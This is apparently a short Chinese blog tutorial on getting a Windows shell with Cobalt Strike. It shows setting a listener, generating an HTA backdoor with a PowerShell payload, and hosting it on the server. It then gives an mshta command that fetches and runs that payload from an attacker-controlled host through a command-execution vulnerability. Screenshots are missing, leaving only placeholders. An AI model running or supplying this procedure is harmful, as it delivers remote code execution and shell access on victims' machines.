设置监听
在这里插入图片描述
生成http application后门 选择powershell脚本
在这里插入图片描述
在这里插入图片描述
然后把生成的evil.hta文件上传到cs服务器上
在这里插入图片描述
在这里插入图片描述

这时已经挂在cs服务器/download目录下

如果有命令执行漏洞,执行mshta+刚才生成的路径

mshta http://192.168.17.181:80/download/file.ext

在这里插入图片描述
然后就获得一个shell,只适用win
在这里插入图片描述

posted on 2022-09-13 18:14  noone52  阅读(24)  评论(0编辑  收藏  举报